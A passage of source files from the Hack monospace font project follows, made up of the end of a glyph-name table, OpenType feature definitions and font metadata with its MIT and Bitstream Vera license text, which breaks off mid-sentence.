<string>uni227B_.glif</string> <key>uni227C</key> <string>uni227C_.glif</string> <key>uni227D</key> <string>uni227D_.glif</string> <key>uni227E</key> <string>uni227E_.glif</string> <key>uni227F</key> <string>uni227F_.glif</string> <key>uni2280</key> <string>uni2280.glif</string> <key>uni2281</key> <string>uni2281.glif</string> <key>uni2285</key> <string>uni2285.glif</string> <key>uni2288</key> <string>uni2288.glif</string> <key>uni2289</key> <string>uni2289.glif</string> <key>uni228A</key> <string>uni228A_.glif</string> <key>uni228B</key> <string>uni228B_.glif</string> <key>uni228D</key> <string>uni228D_.glif</string> <key>uni228E</key> <string>uni228E_.glif</string> <key>uni228F</key> <string>uni228F_.glif</string> <key>uni2290</key> <string>uni2290.glif</string> <key>uni2291</key> <string>uni2291.glif</string> <key>uni2292</key> <string>uni2292.glif</string> <key>uni2293</key> <string>uni2293.glif</string> <key>uni2294</key> <string>uni2294.glif</string> <key>uni2296</key> <string>uni2296.glif</string> <key>uni2298</key> <string>uni2298.glif</string> <key>uni2299</key> <string>uni2299.glif</string> <key>uni229A</key> <string>uni229A_.glif</string> <key>uni229B</key> <string>uni229B_.glif</string> <key>uni229C</key> <string>uni229C_.glif</string> <key>uni229D</key> <string>uni229D_.glif</string> <key>uni229E</key> <string>uni229E_.glif</string> <key>uni229F</key> <string>uni229F_.glif</string> <key>uni22A0</key> <string>uni22A_0.glif</string> <key>uni22A1</key> <string>uni22A_1.glif</string> <key>uni22A2</key> <string>uni22A_2.glif</string> <key>uni22A3</key> <string>uni22A_3.glif</string> <key>uni22A4</key> <string>uni22A_4.glif</string> <key>uni22B2</key> <string>uni22B_2.glif</string> <key>uni22B3</key> <string>uni22B_3.glif</string> <key>uni22B4</key> <string>uni22B_4.glif</string> <key>uni22B5</key> <string>uni22B_5.glif</string> <key>uni22B8</key> <string>uni22B_8.glif</string> <key>uni22C2</key> <string>uni22C_2.glif</string> <key>uni22C3</key> <string>uni22C_3.glif</string> <key>uni22C4</key> <string>uni22C_4.glif</string> <key>uni22C6</key> <string>uni22C_6.glif</string> <key>uni22CD</key> <string>uni22C_D_.glif</string> <key>uni22CE</key> <string>uni22C_E_.glif</string> <key>uni22CF</key> <string>uni22C_F_.glif</string> <key>uni22D0</key> <string>uni22D_0.glif</string> <key>uni22D1</key> <string>uni22D_1.glif</string> <key>uni22DA</key> <string>uni22D_A_.glif</string> <key>uni22DB</key> <string>uni22D_B_.glif</string> <key>uni22DC</key> <string>uni22D_C_.glif</string> <key>uni22DD</key> <string>uni22D_D_.glif</string> <key>uni22DE</key> <string>uni22D_E_.glif</string> <key>uni22DF</key> <string>uni22D_F_.glif</string> <key>uni22E0</key> <string>uni22E_0.glif</string> <key>uni22E1</key> <string>uni22E_1.glif</string> <key>uni22E2</key> <string>uni22E_2.glif</string> <key>uni22E3</key> <string>uni22E_3.glif</string> <key>uni22E4</key> <string>uni22E_4.glif</string> <key>uni22E5</key> <string>uni22E_5.glif</string> <key>uni22E6</key> <string>uni22E_6.glif</string> <key>uni22E7</key> <string>uni22E_7.glif</string> <key>uni22E8</key> <string>uni22E_8.glif</string> <key>uni22E9</key> <string>uni22E_9.glif</string> <key>uni22EF</key> <string>uni22E_F_.glif</string> <key>uni2304</key> <string>uni2304.glif</string> <key>uni2308</key> <string>uni2308.glif</string> <key>uni2309</key> <string>uni2309.glif</string> <key>uni230A</key> <string>uni230A_.glif</string> <key>uni230B</key> <string>uni230B_.glif</string> <key>uni239B</key> <string>uni239B_.glif</string> <key>uni239C</key> <string>uni239C_.glif</string> <key>uni239D</key> <string>uni239D_.glif</string> <key>uni239E</key> <string>uni239E_.glif</string> <key>uni239F</key> <string>uni239F_.glif</string> <key>uni23A0</key> <string>uni23A_0.glif</string> <key>uni23A1</key> <string>uni23A_1.glif</string> <key>uni23A2</key> <string>uni23A_2.glif</string> <key>uni23A3</key> <string>uni23A_3.glif</string> <key>uni23A4</key> <string>uni23A_4.glif</string> <key>uni23A5</key> <string>uni23A_5.glif</string> <key>uni23A6</key> <string>uni23A_6.glif</string> <key>uni23A7</key> <string>uni23A_7.glif</string> <key>uni23A8</key> <string>uni23A_8.glif</string> <key>uni23A9</key> <string>uni23A_9.glif</string> <key>uni23AA</key> <string>uni23A_A_.glif</string> <key>uni23AB</key> <string>uni23A_B_.glif</string> <key>uni23AC</key> <string>uni23A_C_.glif</string> <key>uni23AD</key> <string>uni23A_D_.glif</string> <key>uni23AE</key> <string>uni23A_E_.glif</string> <key>uni2500</key> <string>uni2500.glif</string> <key>uni2501</key> <string>uni2501.glif</string> <key>uni2502</key> <string>uni2502.glif</string> <key>uni2503</key> <string>uni2503.glif</string> <key>uni2504</key> <string>uni2504.glif</string> <key>uni2505</key> <string>uni2505.glif</string> <key>uni2506</key> <string>uni2506.glif</string> <key>uni2507</key> <string>uni2507.glif</string> <key>uni2508</key> <string>uni2508.glif</string> <key>uni2509</key> <string>uni2509.glif</string> <key>uni250A</key> <string>uni250A_.glif</string> <key>uni250B</key> <string>uni250B_.glif</string> <key>uni250C</key> <string>uni250C_.glif</string> <key>uni250D</key> <string>uni250D_.glif</string> <key>uni250E</key> <string>uni250E_.glif</string> <key>uni250F</key> <string>uni250F_.glif</string> <key>uni2510</key> <string>uni2510.glif</string> <key>uni2511</key> <string>uni2511.glif</string> <key>uni2512</key> <string>uni2512.glif</string> <key>uni2513</key> <string>uni2513.glif</string> <key>uni2514</key> <string>uni2514.glif</string> <key>uni2515</key> <string>uni2515.glif</string> <key>uni2516</key> <string>uni2516.glif</string> <key>uni2517</key> <string>uni2517.glif</string> <key>uni2518</key> <string>uni2518.glif</string> <key>uni2519</key> <string>uni2519.glif</string> <key>uni251A</key> <string>uni251A_.glif</string> <key>uni251B</key> <string>uni251B_.glif</string> <key>uni251C</key> <string>uni251C_.glif</string> <key>uni251D</key> <string>uni251D_.glif</string> <key>uni251E</key> <string>uni251E_.glif</string> <key>uni251F</key> <string>uni251F_.glif</string> <key>uni2520</key> <string>uni2520.glif</string> <key>uni2521</key> <string>uni2521.glif</string> <key>uni2522</key> <string>uni2522.glif</string> <key>uni2523</key> <string>uni2523.glif</string> <key>uni2524</key> <string>uni2524.glif</string> <key>uni2525</key> <string>uni2525.glif</string> <key>uni2526</key> <string>uni2526.glif</string> <key>uni2527</key> <string>uni2527.glif</string> <key>uni2528</key> <string>uni2528.glif</string> <key>uni2529</key> <string>uni2529.glif</string> <key>uni252A</key> <string>uni252A_.glif</string> <key>uni252B</key> <string>uni252B_.glif</string> <key>uni252C</key> <string>uni252C_.glif</string> <key>uni252D</key> <string>uni252D_.glif</string> <key>uni252E</key> <string>uni252E_.glif</string> <key>uni252F</key> <string>uni252F_.glif</string> <key>uni2530</key> <string>uni2530.glif</string> <key>uni2531</key> <string>uni2531.glif</string> <key>uni2532</key> <string>uni2532.glif</string> <key>uni2533</key> <string>uni2533.glif</string> <key>uni2534</key> <string>uni2534.glif</string> <key>uni2535</key> <string>uni2535.glif</string> <key>uni2536</key> <string>uni2536.glif</string> <key>uni2537</key> <string>uni2537.glif</string> <key>uni2538</key> <string>uni2538.glif</string> <key>uni2539</key> <string>uni2539.glif</string> <key>uni253A</key> <string>uni253A_.glif</string> <key>uni253B</key> <string>uni253B_.glif</string> <key>uni253C</key> <string>uni253C_.glif</string> <key>uni253D</key> <string>uni253D_.glif</string> <key>uni253E</key> <string>uni253E_.glif</string> <key>uni253F</key> <string>uni253F_.glif</string> <key>uni2540</key> <string>uni2540.glif</string> <key>uni2541</key> <string>uni2541.glif</string> <key>uni2542</key> <string>uni2542.glif</string> <key>uni2543</key> <string>uni2543.glif</string> <key>uni2544</key> <string>uni2544.glif</string> <key>uni2545</key> <string>uni2545.glif</string> <key>uni2546</key> <string>uni2546.glif</string> <key>uni2547</key> <string>uni2547.glif</string> <key>uni2548</key> <string>uni2548.glif</string> <key>uni2549</key> <string>uni2549.glif</string> <key>uni254A</key> <string>uni254A_.glif</string> <key>uni254B</key> <string>uni254B_.glif</string> <key>uni254C</key> <string>uni254C_.glif</string> <key>uni254D</key> <string>uni254D_.glif</string> <key>uni254E</key> <string>uni254E_.glif</string> <key>uni254F</key> <string>uni254F_.glif</string> <key>uni2550</key> <string>uni2550.glif</string> <key>uni2551</key> <string>uni2551.glif</string> <key>uni2552</key> <string>uni2552.glif</string> <key>uni2553</key> <string>uni2553.glif</string> <key>uni2554</key> <string>uni2554.glif</string> <key>uni2555</key> <string>uni2555.glif</string> <key>uni2556</key> <string>uni2556.glif</string> <key>uni2557</key> <string>uni2557.glif</string> <key>uni2558</key> <string>uni2558.glif</string> <key>uni2559</key> <string>uni2559.glif</string> <key>uni255A</key> <string>uni255A_.glif</string> <key>uni255B</key> <string>uni255B_.glif</string> <key>uni255C</key> <string>uni255C_.glif</string> <key>uni255D</key> <string>uni255D_.glif</string> <key>uni255E</key> <string>uni255E_.glif</string> <key>uni255F</key> <string>uni255F_.glif</string> <key>uni2560</key> <string>uni2560.glif</string> <key>uni2561</key> <string>uni2561.glif</string> <key>uni2562</key> <string>uni2562.glif</string> <key>uni2563</key> <string>uni2563.glif</string> <key>uni2564</key> <string>uni2564.glif</string> <key>uni2565</key> <string>uni2565.glif</string> <key>uni2566</key> <string>uni2566.glif</string> <key>uni2567</key> <string>uni2567.glif</string> <key>uni2568</key> <string>uni2568.glif</string> <key>uni2569</key> <string>uni2569.glif</string> <key>uni256A</key> <string>uni256A_.glif</string> <key>uni256B</key> <string>uni256B_.glif</string> <key>uni256C</key> <string>uni256C_.glif</string> <key>uni256D</key> <string>uni256D_.glif</string> <key>uni256E</key> <string>uni256E_.glif</string> <key>uni256F</key> <string>uni256F_.glif</string> <key>uni2570</key> <string>uni2570.glif</string> <key>uni2571</key> <string>uni2571.glif</string> <key>uni2572</key> <string>uni2572.glif</string> <key>uni2573</key> <string>uni2573.glif</string> <key>uni2574</key> <string>uni2574.glif</string> <key>uni2575</key> <string>uni2575.glif</string> <key>uni2576</key> <string>uni2576.glif</string> <key>uni2577</key> <string>uni2577.glif</string> <key>uni2578</key> <string>uni2578.glif</string> <key>uni2579</key> <string>uni2579.glif</string> <key>uni257A</key> <string>uni257A_.glif</string> <key>uni257B</key> <string>uni257B_.glif</string> <key>uni257C</key> <string>uni257C_.glif</string> <key>uni257D</key> <string>uni257D_.glif</string> <key>uni257E</key> <string>uni257E_.glif</string> <key>uni257F</key> <string>uni257F_.glif</string> <key>uni2581</key> <string>uni2581.glif</string> <key>uni2582</key> <string>uni2582.glif</string> <key>uni2583</key> <string>uni2583.glif</string> <key>uni2585</key> <string>uni2585.glif</string> <key>uni2586</key> <string>uni2586.glif</string> <key>uni2587</key> <string>uni2587.glif</string> <key>uni2589</key> <string>uni2589.glif</string> <key>uni258A</key> <string>uni258A_.glif</string> <key>uni258B</key> <string>uni258B_.glif</string> <key>uni258D</key> <string>uni258D_.glif</string> <key>uni258E</key> <string>uni258E_.glif</string> <key>uni258F</key> <string>uni258F_.glif</string> <key>uni2594</key> <string>uni2594.glif</string> <key>uni2595</key> <string>uni2595.glif</string> <key>uni2596</key> <string>uni2596.glif</string> <key>uni2597</key> <string>uni2597.glif</string> <key>uni2598</key> <string>uni2598.glif</string> <key>uni2599</key> <string>uni2599.glif</string> <key>uni259A</key> <string>uni259A_.glif</string> <key>uni259B</key> <string>uni259B_.glif</string> <key>uni259C</key> <string>uni259C_.glif</string> <key>uni259D</key> <string>uni259D_.glif</string> <key>uni259E</key> <string>uni259E_.glif</string> <key>uni259F</key> <string>uni259F_.glif</string> <key>uni25A1</key> <string>uni25A_1.glif</string> <key>uni25A2</key> <string>uni25A_2.glif</string> <key>uni25A3</key> <string>uni25A_3.glif</string> <key>uni25A4</key> <string>uni25A_4.glif</string> <key>uni25A5</key> <string>uni25A_5.glif</string> <key>uni25A6</key> <string>uni25A_6.glif</string> <key>uni25A7</key> <string>uni25A_7.glif</string> <key>uni25A8</key> <string>uni25A_8.glif</string> <key>uni25A9</key> <string>uni25A_9.glif</string> <key>uni25AA</key> <string>uni25A_A_.glif</string> <key>uni25AB</key> <string>uni25A_B_.glif</string> <key>uni25AD</key> <string>uni25A_D_.glif</string> <key>uni25AE</key> <string>uni25A_E_.glif</string> <key>uni25AF</key> <string>uni25A_F_.glif</string> <key>uni25B0</key> <string>uni25B_0.glif</string> <key>uni25B1</key> <string>uni25B_1.glif</string> <key>uni25B3</key> <string>uni25B_3.glif</string> <key>uni25B4</key> <string>uni25B_4.glif</string> <key>uni25B5</key> <string>uni25B_5.glif</string> <key>uni25B6</key> <string>uni25B_6.glif</string> <key>uni25B7</key> <string>uni25B_7.glif</string> <key>uni25B8</key> <string>uni25B_8.glif</string> <key>uni25B9</key> <string>uni25B_9.glif</string> <key>uni25BB</key> <string>uni25B_B_.glif</string> <key>uni25BD</key> <string>uni25B_D_.glif</string> <key>uni25BE</key> <string>uni25B_E_.glif</string> <key>uni25BF</key> <string>uni25B_F_.glif</string> <key>uni25C0</key> <string>uni25C_0.glif</string> <key>uni25C1</key> <string>uni25C_1.glif</string> <key>uni25C2</key> <string>uni25C_2.glif</string> <key>uni25C3</key> <string>uni25C_3.glif</string> <key>uni25C5</key> <string>uni25C_5.glif</string> <key>uni25C6</key> <string>uni25C_6.glif</string> <key>uni25C7</key> <string>uni25C_7.glif</string> <key>uni25C8</key> <string>uni25C_8.glif</string> <key>uni25C9</key> <string>uni25C_9.glif</string> <key>uni25CC</key> <string>uni25C_C_.glif</string> <key>uni25CD</key> <string>uni25C_D_.glif</string> <key>uni25CE</key> <string>uni25C_E_.glif</string> <key>uni25CF</key> <string>uni25C_F_.glif</string> <key>uni25D0</key> <string>uni25D_0.glif</string> <key>uni25D1</key> <string>uni25D_1.glif</string> <key>uni25D2</key> <string>uni25D_2.glif</string> <key>uni25D3</key> <string>uni25D_3.glif</string> <key>uni25D4</key> <string>uni25D_4.glif</string> <key>uni25D5</key> <string>uni25D_5.glif</string> <key>uni25D6</key> <string>uni25D_6.glif</string> <key>uni25D7</key> <string>uni25D_7.glif</string> <key>uni25DA</key> <string>uni25D_A_.glif</string> <key>uni25DB</key> <string>uni25D_B_.glif</string> <key>uni25DC</key> <string>uni25D_C_.glif</string> <key>uni25DD</key> <string>uni25D_D_.glif</string> <key>uni25DE</key> <string>uni25D_E_.glif</string> <key>uni25DF</key> <string>uni25D_F_.glif</string> <key>uni25E0</key> <string>uni25E_0.glif</string> <key>uni25E1</key> <string>uni25E_1.glif</string> <key>uni25E2</key> <string>uni25E_2.glif</string> <key>uni25E3</key> <string>uni25E_3.glif</string> <key>uni25E4</key> <string>uni25E_4.glif</string> <key>uni25E5</key> <string>uni25E_5.glif</string> <key>uni25E7</key> <string>uni25E_7.glif</string> <key>uni25E8</key> <string>uni25E_8.glif</string> <key>uni25E9</key> <string>uni25E_9.glif</string> <key>uni25EA</key> <string>uni25E_A_.glif</string> <key>uni25EB</key> <string>uni25E_B_.glif</string> <key>uni25EC</key> <string>uni25E_C_.glif</string> <key>uni25ED</key> <string>uni25E_D_.glif</string> <key>uni25EE</key> <string>uni25E_E_.glif</string> <key>uni25EF</key> <string>uni25E_F_.glif</string> <key>uni25F0</key> <string>uni25F_0.glif</string> <key>uni25F1</key> <string>uni25F_1.glif</string> <key>uni25F2</key> <string>uni25F_2.glif</string> <key>uni25F3</key> <string>uni25F_3.glif</string> <key>uni25F4</key> <string>uni25F_4.glif</string> <key>uni25F5</key> <string>uni25F_5.glif</string> <key>uni25F6</key> <string>uni25F_6.glif</string> <key>uni25F7</key> <string>uni25F_7.glif</string> <key>uni25F8</key> <string>uni25F_8.glif</string> <key>uni25F9</key> <string>uni25F_9.glif</string> <key>uni25FA</key> <string>uni25F_A_.glif</string> <key>uni25FB</key> <string>uni25F_B_.glif</string> <key>uni25FC</key> <string>uni25F_C_.glif</string> <key>uni25FD</key> <string>uni25F_D_.glif</string> <key>uni25FE</key> <string>uni25F_E_.glif</string> <key>uni25FF</key> <string>uni25F_F_.glif</string> <key>uni2756</key> <string>uni2756.glif</string> <key>uni2768</key> <string>uni2768.glif</string> <key>uni2769</key> <string>uni2769.glif</string> <key>uni276A</key> <string>uni276A_.glif</string> <key>uni276B</key> <string>uni276B_.glif</string> <key>uni276C</key> <string>uni276C_.glif</string> <key>uni276D</key> <string>uni276D_.glif</string> <key>uni276E</key> <string>uni276E_.glif</string> <key>uni276F</key> <string>uni276F_.glif</string> <key>uni2770</key> <string>uni2770.glif</string> <key>uni2771</key> <string>uni2771.glif</string> <key>uni2772</key> <string>uni2772.glif</string> <key>uni2773</key> <string>uni2773.glif</string> <key>uni2774</key> <string>uni2774.glif</string> <key>uni2775</key> <string>uni2775.glif</string> <key>uni2794</key> <string>uni2794.glif</string> <key>uni2798</key> <string>uni2798.glif</string> <key>uni2799</key> <string>uni2799.glif</string> <key>uni279A</key> <string>uni279A_.glif</string> <key>uni279B</key> <string>uni279B_.glif</string> <key>uni279C</key> <string>uni279C_.glif</string> <key>uni279D</key> <string>uni279D_.glif</string> <key>uni279E</key> <string>uni279E_.glif</string> <key>uni279F</key> <string>uni279F_.glif</string> <key>uni27A0</key> <string>uni27A_0.glif</string> <key>uni27A1</key> <string>uni27A_1.glif</string> <key>uni27A2</key> <string>uni27A_2.glif</string> <key>uni27A3</key> <string>uni27A_3.glif</string> <key>uni27A4</key> <string>uni27A_4.glif</string> <key>uni27A5</key> <string>uni27A_5.glif</string> <key>uni27A6</key> <string>uni27A_6.glif</string> <key>uni27A7</key> <string>uni27A_7.glif</string> <key>uni27A8</key> <string>uni27A_8.glif</string> <key>uni27A9</key> <string>uni27A_9.glif</string> <key>uni27AA</key> <string>uni27A_A_.glif</string> <key>uni27AB</key> <string>uni27A_B_.glif</string> <key>uni27AC</key> <string>uni27A_C_.glif</string> <key>uni27AD</key> <string>uni27A_D_.glif</string> <key>uni27AE</key> <string>uni27A_E_.glif</string> <key>uni27AF</key> <string>uni27A_F_.glif</string> <key>uni27B1</key> <string>uni27B_1.glif</string> <key>uni27B2</key> <string>uni27B_2.glif</string> <key>uni27B3</key> <string>uni27B_3.glif</string> <key>uni27B4</key> <string>uni27B_4.glif</string> <key>uni27B5</key> <string>uni27B_5.glif</string> <key>uni27B6</key> <string>uni27B_6.glif</string> <key>uni27B7</key> <string>uni27B_7.glif</string> <key>uni27B8</key> <string>uni27B_8.glif</string> <key>uni27B9</key> <string>uni27B_9.glif</string> <key>uni27BA</key> <string>uni27B_A_.glif</string> <key>uni27BB</key> <string>uni27B_B_.glif</string> <key>uni27BC</key> <string>uni27B_C_.glif</string> <key>uni27BD</key> <string>uni27B_D_.glif</string> <key>uni27BE</key> <string>uni27B_E_.glif</string> <key>uni27C2</key> <string>uni27C_2.glif</string> <key>uni27C5</key> <string>uni27C_5.glif</string> <key>uni27C6</key> <string>uni27C_6.glif</string> <key>uni27DC</key> <string>uni27D_C_.glif</string> <key>uni27E0</key> <string>uni27E_0.glif</string> <key>uni27E6</key> <string>uni27E_6.glif</string> <key>uni27E7</key> <string>uni27E_7.glif</string> <key>uni27E8</key> <string>uni27E_8.glif</string> <key>uni27E9</key> <string>uni27E_9.glif</string> <key>uni27EA</key> <string>uni27E_A_.glif</string> <key>uni27EB</key> <string>uni27E_B_.glif</string> <key>uni27F5</key> <string>uni27F_5.glif</string> <key>uni27F6</key> <string>uni27F_6.glif</string> <key>uni27F7</key> <string>uni27F_7.glif</string> <key>uni2987</key> <string>uni2987.glif</string> <key>uni2988</key> <string>uni2988.glif</string> <key>uni2997</key> <string>uni2997.glif</string> <key>uni2998</key> <string>uni2998.glif</string> <key>uni29EB</key> <string>uni29E_B_.glif</string> <key>uni29FA</key> <string>uni29F_A_.glif</string> <key>uni29FB</key> <string>uni29F_B_.glif</string> <key>uni2A00</key> <string>uni2A_00.glif</string> <key>uni2A2F</key> <string>uni2A_2F_.glif</string> <key>uni2A6A</key> <string>uni2A_6A_.glif</string> <key>uni2A6B</key> <string>uni2A_6B_.glif</string> <key>uni2B05</key> <string>uni2B_05.glif</string> <key>uni2B06</key> <string>uni2B_06.glif</string> <key>uni2B07</key> <string>uni2B_07.glif</string> <key>uni2B08</key> <string>uni2B_08.glif</string> <key>uni2B09</key> <string>uni2B_09.glif</string> <key>uni2B0A</key> <string>uni2B_0A_.glif</string> <key>uni2B0B</key> <string>uni2B_0B_.glif</string> <key>uni2B0C</key> <string>uni2B_0C_.glif</string> <key>uni2B0D</key> <string>uni2B_0D_.glif</string> <key>uni2B16</key> <string>uni2B_16.glif</string> <key>uni2B17</key> <string>uni2B_17.glif</string> <key>uni2B18</key> <string>uni2B_18.glif</string> <key>uni2B19</key> <string>uni2B_19.glif</string> <key>uni2B1A</key> <string>uni2B_1A_.glif</string> <key>uni2C7D</key> <string>uni2C_7D_.glif</string> <key>uni2E18</key> <string>uni2E_18.glif</string> <key>uni2E18.case</key> <string>uni2E_18.case.glif</string> <key>uni2E1F</key> <string>uni2E_1F_.glif</string> <key>uni2E22</key> <string>uni2E_22.glif</string> <key>uni2E23</key> <string>uni2E_23.glif</string> <key>uni2E24</key> <string>uni2E_24.glif</string> <key>uni2E25</key> <string>uni2E_25.glif</string> <key>uni2E2E</key> <string>uni2E_2E_.glif</string> <key>uniE0A0</key> <string>uniE_0A_0.glif</string> <key>uniE0A1</key> <string>uniE_0A_1.glif</string> <key>uniE0A2</key> <string>uniE_0A_2.glif</string> <key>uniE0B0</key> <string>uniE_0B_0.glif</string> <key>uniE0B1</key> <string>uniE_0B_1.glif</string> <key>uniE0B2</key> <string>uniE_0B_2.glif</string> <key>uniE0B3</key> <string>uniE_0B_3.glif</string> <key>uniFEFF</key> <string>uniF_E_F_F_.glif</string> <key>union</key> <string>union.glif</string> <key>universal</key> <string>universal.glif</string> <key>uogonek</key> <string>uogonek.glif</string> <key>upblock</key> <string>upblock.glif</string> <key>upsilon</key> <string>upsilon.glif</string> <key>upsilondieresis</key> <string>upsilondieresis.glif</string> <key>upsilondieresistonos</key> <string>upsilondieresistonos.glif</string> <key>upsilontonos</key> <string>upsilontonos.glif</string> <key>uring</key> <string>uring.glif</string> <key>utilde</key> <string>utilde.glif</string> <key>v</key> <string>v.glif</string> <key>w</key> <string>w.glif</string> <key>wacute</key> <string>wacute.glif</string> <key>wcircumflex</key> <string>wcircumflex.glif</string> <key>wdieresis</key> <string>wdieresis.glif</string> <key>wgrave</key> <string>wgrave.glif</string> <key>x</key> <string>x.glif</string> <key>xi</key> <string>xi.glif</string> <key>y</key> <string>y.glif</string> <key>yacute</key> <string>yacute.glif</string> <key>ycircumflex</key> <string>ycircumflex.glif</string> <key>ydieresis</key> <string>ydieresis.glif</string> <key>yen</key> <string>yen.glif</string> <key>ygrave</key> <string>ygrave.glif</string> <key>z</key> <string>z.glif</string> <key>zacute</key> <string>zacute.glif</string> <key>zcaron</key> <string>zcaron.glif</string> <key>zdotaccent</key> <string>zdotaccent.glif</string> <key>zero</key> <string>zero.glif</string> <key>zero.subs</key> <string>zero.subs.glif</string> <key>zeta</key> <string>zeta.glif</string> </dict> </plist>
Hack/source/Hack-BoldItalic.ufo/features.fea
# Prefix: Languagesystems languagesystem DFLT dflt; languagesystem latn dflt; languagesystem latn MOL ; languagesystem latn ROM ; # Prefix: Prefix @aalt1 = [\zero \one \two \three \four \five \six \seven \eight \nine]; @subs1 = [\zero.subs \one.subs \two.subs \three.subs \four.subs \five.subs \six.subs \seven.subs \eight.subs \nine.subs]; @sups1 = [\uni2070 \uni00B9 \uni00B2 \uni00B3 \uni2074 \uni2075 \uni2076 \uni2077 \uni2078 \uni2079]; # @case1 = [\exclamdown \questiondown \uni2E18 \uni0304 \uni0306 \uni0307 \uni030B \uni030F \uni0311]; # @case2 = [\exclamdown.case \questiondown.case \uni2E18.case \uni0304.case \uni0306.case \uni0307.case \uni030B.case \uni030F.case \uni0311.case]; feature aalt { feature locl; feature subs; feature sinf; feature sups; feature ordn; } aalt; feature locl { # Localized Forms script latn; # Latin language MOL exclude_dflt; # Moldavian sub [Scedilla scedilla] by [uni0218 uni0219]; language ROM exclude_dflt; # Romanian sub [Scedilla scedilla] by [uni0218 uni0219]; } locl; feature subs { # Subscript # DEFAULT sub @aalt1 by @subs1; script latn; # Latin sub @aalt1 by @subs1; language MOL ; # Moldavian language ROM ; # Romanian } subs; feature sinf { # Scientific Inferiors # DEFAULT sub @aalt1 by @subs1; script latn; # Latin sub @aalt1 by @subs1; language MOL ; # Moldavian language ROM ; # Romanian } sinf; feature sups { # Superscript # DEFAULT sub @aalt1 by @sups1; script latn; # Latin sub @aalt1 by @sups1; language MOL ; # Moldavian language ROM ; # Romanian } sups; feature frac { # Fractions # DEFAULT sub one slash two by onehalf; sub one slash three by uni2153; sub one slash four by onequarter; sub one slash five by uni2155; sub one slash six by uni2159; sub one slash eight by oneeighth; sub two slash three by uni2154; sub two slash five by uni2156; sub three slash four by threequarters; sub three slash five by uni2157; sub three slash eight by threeeighths; sub four slash five by uni2158; sub five slash six by uni215A; sub five slash eight by fiveeighths; sub seven slash eight by seveneighths; script latn; # Latin sub one slash two by onehalf; sub one slash three by uni2153; sub one slash four by onequarter; sub one slash five by uni2155; sub one slash six by uni2159; sub one slash eight by oneeighth; sub two slash three by uni2154; sub two slash five by uni2156; sub three slash four by threequarters; sub three slash five by uni2157; sub three slash eight by threeeighths; sub four slash five by uni2158; sub five slash six by uni215A; sub five slash eight by fiveeighths; sub seven slash eight by seveneighths; language MOL ; # Moldavian language ROM ; # Romanian } frac; feature ordn { # Ordinals # DEFAULT sub @aalt1 [A a]' by [ordfeminine ordfeminine]; sub @aalt1 [O o]' by [ordmasculine ordmasculine]; script latn; # Latin sub @aalt1 [A a]' by [ordfeminine ordfeminine]; sub @aalt1 [O o]' by [ordmasculine ordmasculine]; language MOL ; # Moldavian language ROM ; # Romanian } ordn; #feature case { # # Case-Sensitive Forms # # DEFAULT # sub @case1 by @case2; # script latn; # Latin # sub @case1 by @case2; # language MOL ; # Moldavian # language ROM ; # Romanian #} case;
Hack/source/Hack-BoldItalic.ufo/fontinfo.plist
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>ascender</key> <integer>1556</integer> <key>capHeight</key> <integer>1495</integer> <key>copyright</key> <string>Copyright (c) 2018 Source Foundry Authors / Copyright (c) 2003 by Bitstream, Inc. All Rights Reserved.</string> <key>descender</key> <integer>-492</integer> <key>familyName</key> <string>Hack</string> <key>italicAngle</key> <real>-11</real> <key>macintoshFONDFamilyID</key> <integer>128</integer> <key>macintoshFONDName</key> <string>Hack</string> <key>note</key> <string></string> <key>openTypeHeadCreated</key> <string>2017/10/23 12:00:00</string> <key>openTypeHeadFlags</key> <array> </array> <key>openTypeHheaAscender</key> <integer>1901</integer> <key>openTypeHheaDescender</key> <integer>-483</integer> <key>openTypeHheaLineGap</key> <integer>0</integer> <key>openTypeNameCompatibleFullName</key> <string>Hack Bold Italic</string> <key>openTypeNameDescription</key> <string></string> <key>openTypeNameDesigner</key> <string>Source Foundry Authors</string> <key>openTypeNameDesignerURL</key> <string>https://github.com/source-foundry/Hack</string> <key>openTypeNameLicense</key> <string>The work in the Hack project is Copyright 2018 Source Foundry Authors and licensed under the MIT License The work in the DejaVu project was committed to the public domain. Bitstream Vera Sans Mono Copyright 2003 Bitstream Inc. and licensed under the Bitstream Vera License with Reserved Font Names "Bitstream" and "Vera" MIT License Copyright (c) 2018 Source Foundry Authors Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. BITSTREAM VERA LICENSE Copyright (c) 2003 by Bitstream, Inc. All Rights Reserved. Bitstream Vera is a trademark of Bitstream, Inc. Permission is hereby granted, free of charge, to any person obtaining a copy of the fonts accompanying this license ("Fonts") and associated documentation files (the "Font Software"), to reproduce and distribute the Font Software, including without limitation the rights to use, copy, merge, publish, distribute, and/or sell copies of the Font Software, and to permit persons to whom the Font Software is furnished to do so, subject to the following conditions: The above copyright and trademark notices and this permission notice shall be included in all copies of one or more of the Font Software typefaces. The Font Software may be modified, altered, or added to, and in particular the designs of glyphs or characters in the Fonts may be modified and additional glyphs or characters may be added to the Fonts, only if the fonts are renamed to names not containing either the words "Bitstream" or the word "Vera". This License becomes null and void to the extent applicable to Fonts or Font Software that has been modified and is distributed under the "Bitstream Vera" names. The Font Software may be sold as part of a larger software package but no copy of one or more of the Font Software typefaces may be sold by itself. THE FONT SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT OF COPYRIGHT, PATENT, TRADEMARK, OR OTHER RIGHT. IN NO EVENT SHALL BITSTREAM OR THE GNOME FOUNDATION BE 